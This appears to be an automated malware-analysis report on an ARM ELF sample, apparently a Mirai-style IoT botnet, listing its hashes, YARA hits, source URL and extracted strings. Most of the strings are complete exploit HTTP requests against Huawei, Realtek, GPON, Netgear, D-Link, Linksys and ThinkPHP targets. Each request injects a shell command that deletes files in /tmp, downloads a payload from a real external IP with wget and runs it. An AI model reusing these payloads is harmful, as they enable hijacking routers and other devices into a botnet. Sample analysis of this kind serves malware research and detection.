Sample details: b0c92d38efbd6b03a97c8ebe79b0504c --

Hashes
MD5: b0c92d38efbd6b03a97c8ebe79b0504c
SHA1: 50c2a0adf8b1a643a2c54c35b060f4062da2d40e
SHA256: e37ad976e12b1c0c156c5d06d34ec262f2582cac117f55fac33b406509b98f3a
SSDEEP: 1536:5txmEAw/SgEBSuoHkoERXfzm5ccJW5G3PfBj45dnv2Dh:5DmdGS5BZoBImZJW6BM
Details
File Type: ELF
Yara Hits
YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/Big_Numbers1 |
Source
http://78.141.208.13/bins/Sempai.arm5
Strings
		/lib/ld-uClibc.so.0
memcpy
libc.so.0
strcpy
sysconf
connect
sigemptyset
memmove
usleep
getpid
readlink
malloc
recvfrom
socket
select
readdir
sigaddset
accept
calloc
inet_addr
setsockopt
signal
sendto
realloc
strtok
listen
__uClibc_main
strdup
memset
getppid
opendir
gethostbyname
sprintf
getsockopt
__errno_location
strlen
__data_start
setsid
closedir
sigprocmask
getsockname
__exidx_start
__exidx_end
_edata
__bss_start
__bss_start__
__bss_end__
__end__
POST /cdn-cgi/
 HTTP/1.1
User-Agent: 
Host: 
Cookie: 
GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://78.141.208.13/bins/Sempai.arm7;chmod+777+bins/Sempai.arm7;/tmp/bins/Sempai.arm7+varcron
%d.%d.%d.%d
GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://78.141.208.13/bins/Sempai.mips;${IFS}sh${IFS}/var/tmp/bins/Sempai.mips
POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Host: %s:49152
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Hello, World
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://78.141.208.13/bins/Sempai.mips;/tmp/bins/Sempai.mips dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>
GET /shell?cd+/tmp;rm+-rf+*;wget+http://78.141.208.13/bins/Sempai.arm7;chmod+777+bins/Sempai.arm7;/tmp/bins/Sempai.arm7+jaws HTTP/1.1
User-Agent: Hello, world
Host: %s:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://78.141.208.13/bins/Sempai.arm7;sh${IFS}/tmp/bins/Sempai.arm7&>r&&tar${IFS}/string.js HTTP/1.0
POST /HNAP1/ HTTP/1.0
Host: %s:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://78.141.208.13/bins/Sempai.mips && chmod 777 /tmp/bins/Sempai.mips/ && /tmp/bins/Sempai.mips`
Content-Length: 640
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7574
User-Agent: Hello, world
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 640
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://78.141.208.13/tr064 && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:5555
User-Agent: Hello, world
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 640
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://78.141.208.13/tr064 && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Host: %s:37215
Content-Length: 601
Connection: keep-alive
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 78.141.208.13 -l /tmp/huawei -r /bins/Sempai.mips;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://78.141.208.13/bins/Sempai.mips+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
POST /picsdesc.xml HTTP/1.1
Host: %s:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Hello, World
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/; rm -rf*; wget http://78.141.208.13/bins/Sempai.mips`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /picsdesc.xml HTTP/1.1
Host: %s:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Hello, World
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;chmod +x Sempai.mips;./Sempai.mips realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://78.141.208.13/bins/Sempai.mips+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://78.141.208.13/bins/Sempai.mips+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0
POST /GponForm/diag_Form?style/ HTTP/1.1
User-Agent: Hello, World
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://78.141.208.13/bins/Sempai.mips+-O+->/tmp/gaf;sh+/tmp/gaf`&ipv=0
POST /tmUnblock.cgi HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Tsunami.mpsl%3B+wget+http%3A%2F%2F78.141.208.13%2Fvb%2FSempai.mpsl%3B+chmod+777+Sempai.mpsl%3B+.%2FSempai.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
TXYCEX[
QBT\C_RGX[^TR
dRZGV^
tXYYRTC^XY
V[^AR7
vTTRGC
VGG[^TVC^XY
VGG[^TVC^XY
vTTRGC
{VYPBVPR
tXYCRYC
VGG[^TVC^XY
BE[RYTXSRS7
DRCtXX\^R
ERQERD_
[XTVC^XY
TXX\^R
TXYCRYC
[RYPC_
CEVYDQRE
RYTXS^YP
T_BY\RS7
TXYYRTC^XY
DREARE
SXDVEERDC7
DREARE
T[XBSQ[VER
YP^YO7
EXBCR7
VDD@XES7
DCVCBD7
RYCRE7
UBDNUXO
~dRZGV^7
~dRZGV^
VGG[RC
QXBYS7
YTXEERTC7
RYVU[R7
DNDCRZ7
D_R[[7
cdXBETR
rYP^YR
fBREN7
ERDX[A
YVZRDREARE7
tXX\^R
@VCT_SXP7
@VCT_SXP7
h@VCT_SXP7
@VCT_SXP7
@VCT_SXP
SRQVB[C
@VCT_SXP7
@VCT_SXP7
zXM^[[V
`^YSX@D
vGG[R`RU|^C
t_EXZR
dVQVE^
zXM^[[V
`^YSX@D
vGG[R`RU|^C
t_EXZR
dVQVE^
zXM^[[V
`^YSX@D
vGG[R`RU|^C
t_EXZR
dVQVE^
zXM^[[V
`^YSX@D
vGG[R`RU|^C
t_EXZR
dVQVE^
zXM^[[V
zVT^YCXD_
vGG[R`RU|^C
aRED^XY
dVQVE^
VUTSRQP_^]\[ZYXGFEDCBA@
GET /index.php?s=/index/	hink
pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://78.141.208.13/bins/Sempai.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Tsunami/2.0
.shstrtab
.interp
.dynsym
.dynstr
.rel.plt
.rodata
.init_array
.fini_array
.dynamic
.ARM.attributes